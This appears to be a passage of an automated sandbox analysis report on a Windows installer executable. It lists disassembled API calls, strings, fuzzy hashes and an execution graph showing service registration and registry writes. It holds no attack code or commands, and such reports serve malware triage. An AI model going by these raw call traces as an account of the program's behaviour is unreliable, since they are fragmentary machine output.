• String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
• API String ID: 1452528299-1392080489
• Opcode ID: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
• Instruction ID: 1e7f5b79b7b83b0710ae0b74761658cb8013dc9fe861025df3af78f0f88b0ad9
• Opcode Fuzzy Hash: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
• Instruction Fuzzy Hash: B1016734E0824856CF04D7EEA0412DDBBE49F09314F4485EFA855DB383EB7A0A0987AB
APIs
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
• RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000,0045AEF5), ref: 004552F4
• RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000), ref: 004552FD
• RemoveFontResourceA.GDI32(00000000), ref: 0045530A
• SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045531E
Similarity
• API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
• String ID:
• API String ID: 4283692357-0
• Opcode ID: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
• Instruction ID: 219cbfe3a978a329188234ed78272d854ba8405160bd4c7ea72be768510c46b8
• Opcode Fuzzy Hash: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
• Instruction Fuzzy Hash: A3F05EB574070036EA10B6B69C87F2F268C9F98746F10483BBA04EF2C3D97CD804562D
APIs
• GetLastError.KERNEL32(0000003C,00000000), ref: 0046F5D5
Strings
• Unsetting NTFS compression on file: %s, xrefs: 0046F5BB
• Setting NTFS compression on file: %s, xrefs: 0046F5A3
• Failed to set NTFS compression state (%d)., xrefs: 0046F5E6
Similarity
• API ID: ErrorLast
• String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
• API String ID: 1452528299-3038984924
• Opcode ID: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
• Instruction ID: af1263a2bc2d08d5f84e5bf4467a93fc8ad6fd7f39d305876acfad47ab44e8ff
• Opcode Fuzzy Hash: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
• Instruction Fuzzy Hash: 43016C30D0824865CF14DB9DA0412DDBBE49F09314F5485FFA895DB343EA790A0D8BAB
APIs
Similarity
• API ID: ErrorLast$CountSleepTick
• String ID:
• API String ID: 2227064392-0
• Opcode ID: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
• Instruction ID: 04319ed9576db886230fb9bc867ee798ddcaac356600663dffa6fb38092a16ff
• Opcode Fuzzy Hash: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
• Instruction Fuzzy Hash: 70E09B7230954149DA2935BF28C67BF5588CBC5764F145D3FF08DD6282C91C4C4796BE
APIs
• GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A,00000000), ref: 00476CB5
• OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 00476CBB
• GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CDD
• CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CEE
Similarity
• API ID: ProcessToken$CloseCurrentHandleInformationOpen
• String ID:
• API String ID: 215268677-0
• Opcode ID: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
• Instruction ID: 52cacee470f693cc175e787ed480d05e054b7fb82800b5b9fad0ca038f03fef1
• Opcode Fuzzy Hash: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
• Instruction Fuzzy Hash: 04F01CA16447016ED600EAB5CD82A9B76DCEB44354F04883ABE98C72C1D678D808AA66
APIs
• GetLastActivePopup.USER32(?), ref: 0042425C
• IsWindowVisible.USER32(?), ref: 0042426D
• IsWindowEnabled.USER32(?), ref: 00424277
• SetForegroundWindow.USER32(?), ref: 00424281
Similarity
• API ID: Window$ActiveEnabledForegroundLastPopupVisible
• String ID:
• API String ID: 2280970139-0
• Opcode ID: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
• Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
• Opcode Fuzzy Hash: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
• Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC
APIs
• GlobalHandle.KERNEL32 ref: 00406287
• GlobalUnlock.KERNEL32(00000000), ref: 0040628E
• GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
• GlobalLock.KERNEL32(00000000), ref: 00406299
Similarity
• API ID: Global$AllocHandleLockUnlock
• String ID:
• API String ID: 2167344118-0
• Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
• Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
• Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
• Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
APIs
• GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 0046A1F3
• EnableMenuItem.USER32(00000000,00000000,00000000), ref: 0046A1F9
Strings
Similarity
• API ID: Menu$EnableItemSystem
• String ID: CurPageChanged
• API String ID: 3692539535-2490978513
• Opcode ID: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
• Instruction ID: 7720c050ea6da0ef8e1be1b899a85f81ec2d70891b76be637dda81d079de5e74
• Opcode Fuzzy Hash: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
• Instruction Fuzzy Hash: 04B12834604604DFCB11DB59DA85EE973F5EF49308F2540F6E804AB362EB38AE51DB4A
APIs
• RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047A685,?,00000000,00000000,00000001,00000000,004790B1,?,00000000), ref: 00479075
Strings
• Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00478EE9
• Failed to parse "reg" constant, xrefs: 0047907C
Similarity
• API ID: Close
• String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
• API String ID: 3535843008-1938159461
• Opcode ID: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
• Instruction ID: fcc941d39f61a36dc7ba98d018d7fa63e98928215e6e5a71d63c1788f81e571e
• Opcode Fuzzy Hash: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
• Instruction Fuzzy Hash: F3818174E00148AFCF10EF95D485ADEBBF9AF49314F50816AE814B7391CB38AE05CB99
APIs
• GetForegroundWindow.USER32(00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 0048196F
• SetActiveWindow.USER32(?,00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 00481981
Strings
• Will not restart Windows automatically., xrefs: 00481AA0
                                                                              Similarity
                                                                              • API ID: Window$ActiveForeground
                                                                              • String ID: Will not restart Windows automatically.
                                                                              • API String ID: 307657957-4169339592
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 00424975
                                                                              • WaitMessage.USER32(00000000,00424A69,?,?,?,?), ref: 00424A49
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: CursorMessageWait
                                                                              • String ID: +qI
                                                                              • API String ID: 4021538199-4068327824
                                                                              Strings
                                                                              • Failed to proceed to next wizard page; showing wizard., xrefs: 0046BD6B
                                                                              • Failed to proceed to next wizard page; aborting., xrefs: 0046BD57
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                              • API String ID: 0-1974262853
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegCloseKey.ADVAPI32(?,00477A26,?,?,00000001,00000000,00000000,00477A41), ref: 00477A0F
                                                                              Strings
                                                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0047799A
                                                                              • %s\%s_is1, xrefs: 004779B8
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                              • API String ID: 47109696-1598650737
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044FA1D
                                                                              • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044FA4E
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ExecuteMessageSendShell
                                                                              • String ID: open
                                                                              • API String ID: 812272486-2758837156
                                                                              APIs
                                                                              • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,)), ref: 004025C7
                                                                              • RtlLeaveCriticalSection.KERNEL32(0049A420,0040263D), ref: 00402630
                                                                                • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02161C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02161C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02161C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02161C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                              • String ID: )
                                                                              • API String ID: 2227675388-1084416617
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00494FC5
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Window
                                                                              • String ID: /INITPROCWND=$%x $@
                                                                              • API String ID: 2353593579-4169826103
                                                                              APIs
                                                                                • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                              • SysFreeString.OLEAUT32(?), ref: 00446D1A
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: String$AllocByteCharFreeMultiWide
                                                                              • String ID: NIL Interface Exception$Unknown Method
                                                                              • API String ID: 3952431833-1023667238
                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000,0049489F), ref: 0049486A
                                                                              • CloseHandle.KERNEL32(00494904,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000), ref: 00494881
                                                                                • Part of subcall function 00494754: GetLastError.KERNEL32(00000000,004947EC,?,?,?,?), ref: 00494778
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: CloseCreateErrorHandleLastProcess
                                                                              • String ID: D
                                                                              • API String ID: 3798668922-2746444292
                                                                              APIs
                                                                              • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DCA0
                                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DCE0
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Value$EnumQuery
                                                                              • String ID: Inno Setup: No Icons
                                                                              • API String ID: 1576479698-2016326496
                                                                              APIs
                                                                                • Part of subcall function 0047BB30: FreeLibrary.KERNEL32(6FB90000,0047FFE2), ref: 0047BB46
                                                                                • Part of subcall function 0047B804: GetTickCount.KERNEL32 ref: 0047B84C
                                                                                • Part of subcall function 0045648C: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004564AB
                                                                              • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00496E1F), ref: 0049651D
                                                                              • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00496E1F), ref: 00496523
                                                                              Strings
                                                                              • Detected restart. Removing temporary directory., xrefs: 004964D7
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                              • String ID: Detected restart. Removing temporary directory.
                                                                              • API String ID: 1717587489-3199836293
                                                                              • Opcode ID: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
                                                                              • Instruction ID: ef6d07dd072ead5de2427941989604cf9fc91a718c8df879baec15603ccd013a
                                                                              • Opcode Fuzzy Hash: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
                                                                              • Instruction Fuzzy Hash: BFE0ED722086007EDA0277BABC16A1B3F5CDB8677C793083BF90882543CA2D8804D6BD
                                                                              APIs
                                                                                • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                              • ReleaseMutex.KERNEL32(00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000), ref: 00496BFB
                                                                              • CloseHandle.KERNEL32(00000000,00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C), ref: 00496C04
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseDeleteFileHandleMutexRelease
                                                                              • String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
                                                                              • API String ID: 3841931355-3392794427
                                                                              • Opcode ID: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
                                                                              • Instruction ID: 9d4ffa1f72b1828a9bd2e7b92801d6c81e017e55b738e106198dcdadd1a8305d
                                                                              • Opcode Fuzzy Hash: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
                                                                              • Instruction Fuzzy Hash: B6F0A7316086549EDF05ABA5E82296E7BA8FB48314F63087BF404E65C0D53C5C10CA2C
                                                                              APIs
                                                                              • SetFocus.USER32(00000000,+qI,00000000,00421A84,00000000,00000000,00418608,00000000,00000001,?,?,00464ADA,00000001,00000000,00000000,0046A045), ref: 00421D5B
                                                                              • GetFocus.USER32 ref: 00421D69
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Focus
                                                                              • String ID: +qI
                                                                              • API String ID: 2734777837-4068327824
                                                                              • Opcode ID: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                              • Instruction ID: 7c51ddb3d8c31a7125e72aada4db547e67c97af2ef3b4f9e878502f62af25610
                                                                              • Opcode Fuzzy Hash: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                              • Instruction Fuzzy Hash: EAE04831710211A7DB1036796C857EB11855B64344F55947FF546DB263DE7CDC85068C
                                                                              APIs
                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000,0049A628), ref: 00456C11
                                                                              • FileTimeToSystemTime.KERNEL32(00000000,$pI,00000000,0049A628), ref: 00456C28
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Time$FileSystem
                                                                              • String ID: $pI
                                                                              • API String ID: 2086374402-3761944556
                                                                              • Opcode ID: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
                                                                              • Instruction ID: 229b1bfa25ea94c428731b1611971c6890b9b5f6c230ce37e6a86d23df0ccc86
                                                                              • Opcode Fuzzy Hash: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
                                                                              • Instruction Fuzzy Hash: DFD05B7340830C66CF01F1E5AC82CCFB79CD504324F100677A118A25C1FE39A654565C
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(00000000,0049707A), ref: 0040334B
                                                                              • GetCommandLineA.KERNEL32(00000000,0049707A), ref: 00403356
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CommandHandleLineModule
                                                                              • String ID: H6p
                                                                              • API String ID: 2123368496-1490150691
                                                                              • Opcode ID: 746e9a92de36605cdfd87c84c822714f18c0eb0a2b64ce99e66b90c69837d839
                                                                              • Instruction ID: 938fc5d7150061a66cd9a397de50459b98cc473a78e96f9e03329754a5f1b6bd
                                                                              • Opcode Fuzzy Hash: 746e9a92de36605cdfd87c84c822714f18c0eb0a2b64ce99e66b90c69837d839
                                                                              • Instruction Fuzzy Hash: 57C002A09012058AE750AFB6A84AB552A94A751349F8044BFB104BA2E2DA7D82156BDF
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastSleep
                                                                              • String ID:
                                                                              • API String ID: 1458359878-0
                                                                              • Opcode ID: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
                                                                              • Instruction ID: 9275ee504a9eb35dba3a5523cc5197587f06a42b27f59d217f7189e04cd8cbf1
                                                                              • Opcode Fuzzy Hash: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
                                                                              • Instruction Fuzzy Hash: 1FF024B6B04514678F20E99FD881B2F62CCDAD836E710012BFC04DF343C438EE8986A9

                                                                              Execution Graph

                                                                              Execution Coverage:21.7%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:13.5%
                                                                              Total number of Nodes:399
                                                                              Total number of Limit Nodes:7
                                                                              execution_graph 2499 404b30 2500 404b38 2499->2500 2501 404bca 2500->2501 2503 404a40 RtlUnwind 2500->2503 2504 404a58 2503->2504 2504->2500 2036 402f72 GetVersion 2061 4032aa HeapCreate 2036->2061 2038 402fd1 2039 402fd6 2038->2039 2040 402fde 2038->2040 2161 40308d 2039->2161 2073 404892 2040->2073 2044 402fe6 GetCommandLineA 2087 404760 2044->2087 2048 403000 2119 40445a 2048->2119 2050 403005 2051 40300a GetStartupInfoA 2050->2051 2132 404402 2051->2132 2053 40301c GetModuleHandleA 2136 4026f0 GetModuleHandleA GetModuleFileNameA 2053->2136 2056 403040 2167 4041a9 2056->2167 2062 403300 2061->2062 2063 4032ca 2061->2063 2062->2038 2174 403162 2063->2174 2066 4032e6 2068 403303 2066->2068 2188 403b58 2066->2188 2067 4032d9 2186 403307 HeapAlloc 2067->2186 2068->2038 2071 4032e3 2071->2068 2072 4032f4 HeapDestroy 2071->2072 2072->2062 2251 402ec0 2073->2251 2075 4048b1 GetStartupInfoA 2083 4049c2 2075->2083 2086 4048fd 2075->2086 2079 4049e9 GetStdHandle 2082 4049f7 GetFileType 2079->2082 2079->2083 2080 404a29 SetHandleCount 2080->2044 2081 402ec0 12 API calls 2081->2086 2082->2083 2083->2079 2083->2080 2084 40496e 2084->2083 2085 404990 GetFileType 2084->2085 2085->2084 2086->2081 2086->2083 2086->2084 2088 40477b GetEnvironmentStringsW 2087->2088 2089 4047ae 2087->2089 2090 404783 2088->2090 2091 40478f GetEnvironmentStrings 2088->2091 2089->2090 2093 40479f 2089->2093 2094 4047c7 WideCharToMultiByte 2090->2094 2095 4047bb GetEnvironmentStringsW 2090->2095 2092 402ff6 2091->2092 2091->2093 2110 404513 2092->2110 2093->2092 2096 404841 GetEnvironmentStrings 2093->2096 2097 40484d 2093->2097 2099 4047fb 2094->2099 2100 40482d FreeEnvironmentStringsW 2094->2100 2095->2092 2095->2094 2096->2092 2096->2097 2101 402ec0 12 API calls 2097->2101 2102 402ec0 12 API calls 2099->2102 2100->2092 2108 404868 2101->2108 2103 404801 2102->2103 2103->2100 2104 40480a WideCharToMultiByte 2103->2104 
2106 404824 2104->2106 2107 40481b 2104->2107 2105 40487e FreeEnvironmentStringsA 2105->2092 2106->2100 2317 4030b1 2107->2317 2108->2105 2111 404525 2110->2111 2112 40452a GetModuleFileNameA 2110->2112 2347 40588b 2111->2347 2114 40454d 2112->2114 2115 402ec0 12 API calls 2114->2115 2116 40456e 2115->2116 2117 40457e 2116->2117 2118 403068 7 API calls 2116->2118 2117->2048 2118->2117 2120 404467 2119->2120 2122 40446c 2119->2122 2121 40588b 19 API calls 2120->2121 2121->2122 2123 402ec0 12 API calls 2122->2123 2124 404499 2123->2124 2125 403068 7 API calls 2124->2125 2130 4044ad 2124->2130 2125->2130 2126 4044f0 2127 4030b1 7 API calls 2126->2127 2128 4044fc 2127->2128 2128->2050 2129 402ec0 12 API calls 2129->2130 2130->2126 2130->2129 2131 403068 7 API calls 2130->2131 2131->2130 2133 40440b 2132->2133 2135 404410 2132->2135 2134 40588b 19 API calls 2133->2134 2134->2135 2135->2053 2371 402dd0 2136->2371 2141 402776 lstrcmpiW 2143 402788 2141->2143 2144 4027ed lstrcmpiW 2141->2144 2142 402948 StartServiceCtrlDispatcherA 2142->2056 2143->2142 2152 4027a7 2143->2152 2157 4027e8 2143->2157 2145 402805 2144->2145 2146 40289c lstrcmpiW 2144->2146 2377 402548 2145->2377 2146->2142 2147 4028ae RegCreateKeyExA 2146->2147 2149 4028d0 2147->2149 2150 40292f SetEvent 2147->2150 2156 4028e2 GetTickCount wsprintfA RegSetValueExA RegCloseKey 2149->2156 2396 402351 2150->2396 2159 4027bc CreateFileA CloseHandle ExitProcess 2152->2159 2154 402812 RegCreateKeyExA 2154->2142 2155 402838 2154->2155 2160 40284a GetTickCount wsprintfA RegSetValueExA RegCloseKey 2155->2160 2156->2150 2157->2142 2160->2142 2162 403096 2161->2162 2163 40309b 2161->2163 2164 404c10 7 API calls 2162->2164 2165 404c49 7 API calls 2163->2165 2164->2163 2166 4030a4 ExitProcess 2165->2166 2456 4041cb 2167->2456 2170 40427e 2171 40428a 2170->2171 2172 4043b3 UnhandledExceptionFilter 2171->2172 2173 40305a 2171->2173 2172->2173 2197 402da0 2174->2197 2177 4031a5 GetEnvironmentVariableA 2181 4031c4 2177->2181 
